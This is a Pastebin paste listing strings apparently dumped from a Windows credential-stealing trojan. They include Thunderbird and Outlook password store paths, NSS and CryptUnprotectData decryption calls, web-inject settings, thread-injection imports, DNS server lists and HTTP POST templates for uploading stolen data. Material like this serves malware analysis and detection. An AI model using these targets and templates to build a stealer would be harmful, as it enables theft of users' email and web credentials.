Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- LdrGetProcedureAddress
- RtlNtStatusToDosError
- RtlSetLastWin32Error
- NtQueryVirtualMemory
- NtAllocateVirtualMemory
- NtFreeVirtualMemory
- NtProtectVirtualMemory
- NtReadVirtualMemory
- NtWriteVirtualMemory
- NtGetContextThread
- NtSetContextThread
- true
- false
- null
- null
- true
- false
- \r\n\r\n
- HTTP/1.
- Transfer-Encoding
- chunked
- Content-Length
- Connection
- close
- Proxy-Connection
- close
- HTTP/1.
- Host
- Content-Length
- https://
- Referer
- Content-Type
- Authorization
- %x\r\n
- \r\n0\r\n\r\n
- Content-Length
- identity
- Accept-Encoding
- If-Modified-Since
- --->
- <!---
- --->
- <!---
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\Dns\\
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\Dns\\
- Resource: (%S), Service: (%S), User: (%S), Password: (%S)
- EMAIL
- Resource: (%s), Service: (%s), User: (%s), Password: (%s)
- PK11SDR_Decrypt
- SECITEM_ZfreeItem
- %s\\Thunderbird\\profiles.ini
- Path
- Profile0
- %s\\Thunderbird\\%s\\logins.json
- NSS_Init
- \"hostname\":\"
- \"encryptedUsername\":\"
- \"encryptedPassword\":\"
- NULL
- HTTPMail User Name
- HTTPMail Server
- HTTPMail Password2
- POP3 User Name
- POP3 Server
- POP3 Password2
- IMAP User Name
- IMAP Server
- IMAP Password2
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP User
- HTTP Server URL
- HTTP Password
- POP3 User
- POP3 Server
- POP3 Password
- IMAP User
- IMAP Server
- IMAP Password
- pstorec.dll
- PStoreCreateInstance
- 220d5cd0
- 220d5cc1
- crypt32.dll
- CryptUnprotectData
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP User
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP Server URL
- HTTP Password
- POP3 User
- POP3 Server
- POP3 Password
- IMAP User
- IMAP Server
- IMAP Password
- crypt32.dll
- CryptUnprotectData
- Software\\Microsoft\\Internet Account Manager\\Accounts
- Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts
- Transfer-Encoding
- user_pref(\"network.http.spdy.enabled\", false);\r\nuser_pref(\"network.http.spdy.enabled.http2\", false);\r\n
- \r\n\r\n
- HTTP/1.
- chunked
- Content-Length
- Connection
- close
- Proxy-Connection
- close
- HTTP/1.
- Host
- Content-Length
- https://
- Referer
- Content-Type
- Authorization
- %x\r\n
- \r\n0\r\n\r\n
- Content-Length
- identity
- Accept-Encoding
- If-Modified-Since
- PR_GetNameForIdentity
- PR_SetError
- PR_GetError
- PR_OpenTCPSocket
- PR_Close
- application/x-www-form-urlencoded
- NONE
- script
- script
- nbsp;
- <!DOCTYPE
- InternetCloseHandle gle: 0x%X, %u
- InternetCloseHandle
- InternetQueryDataAvailable
- HttpOpenRequestW
- InternetConnectW
- HttpSendRequestW
- InternetReadFile
- InternetWriteFile
- LdrLoadDll
- LdrGetProcedureAddress
- RtlInitAnsiString
- RtlCreateUnicodeStringFromAsciiz
- RtlCreateUserThread
- LdrLoadDll
- LdrGetProcedureAddress
- RtlInitAnsiString
- RtlCreateUnicodeStringFromAsciiz
- RtlCreateUserThread
- IsWow64Process
- %[^:]:%d
- RtlCompressBuffer
- RtlGetCompressionWorkSpaceSize
- RtlDecompressBuffer
- GdipCreateBitmapFromHBITMAP
- GdipSaveImageToFile
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\
- injects
- set_host
- set_path
- inject_setting
- data_keyword
- inject_before_keyword
- inject_after_keyword
- 8.8.8.8
- sourpuss.net
- ns1.opennameserver.org
- freya.stelas.de
- ns.dotbit.me
- ns1.moderntld.com
- ns1.rodgerbruce.com
- ns14.ns.ph2network.org
- newton.bambusoft.mx
- secondary.server.edv-froehlich.de
- philipostendorf.de
- a.dnspod.com
- b.dnspod.com
- c.dnspod.com
- _wv=%ls
- _wv=%ls
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
- POST %s HTTP/1.0\r\nHost: %s\r\n%s\r\nCookie: %s=%s\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: %i\r\n\r\n%s\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
- POST %s HTTP/1.0\r\nHost: %s\r\n%s\r\nCookie: %s=%s\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: %i\r\n\r\n%s\n
- \r\n-----------------------------%d\r\n
- \r\n-----------------------------%d\r\n
- -----------------------------%d\r\nContent-Disposition: form-data;name=\"fname\"\r\n\r\n%ls\r\n-----------------------------%d\r\nContent-Disposition: form-data; name=\"data\"; filename=\"%ls\"\r\nContent-Type: application/octet-stream\r\n\r\n
- -----------------------------%d\r\nContent-Disposition: form-data;name=\"fname\"\r\n\r\n%ls\r\n-----------------------------%d\r\nContent-Disposition: form-data; name=\"data\"; filename=\"%ls\"\r\nContent-Type: application/octet-stream\r\n\r\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- POST %s HTTP/1.0\r\nHost: %s\r\nCookie: %s=%s;uid=%ls\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\nContent-Type: multipart/form-data; boundary=---------------------------%d\r\nContent-Length: %d\r\nConnection: close\r\n\r\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- POST %s HTTP/1.0\r\nHost: %s\r\nCookie: %s=%s;uid=%ls\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\nContent-Type: multipart/form-data; boundary=---------------------------%d\r\nContent-Length: %d\r\nConnection: close\r\n\r\n
- GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */* \r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nConnection: Close\r\n\r\n\r\n
- GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */* \r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nConnection: Close\r\n\r\n\r\n
- --->
- <!---
- %02X
- https://
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
- HTTP/1.1
- POST
- Connection: close\r\n
- urlmon.dll
- ObtainUserAgentString
- InitSecurityInterfaceA
- Microsoft Unified Security Protocol Provider
- gdiplus.dll
- CRYPT32.dll
- WININET.dll
- SHLWAPI.dll
- PSAPI.DLL
- WS2_32.dll
- DNSAPI.dll
- KERNEL32.dll
- USER32.dll
- GDI32.dll
- ADVAPI32.dll
- SHELL32.dll
- ole32.dll
- MSVCRT.dll
- PR_Read
- PR_Write
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement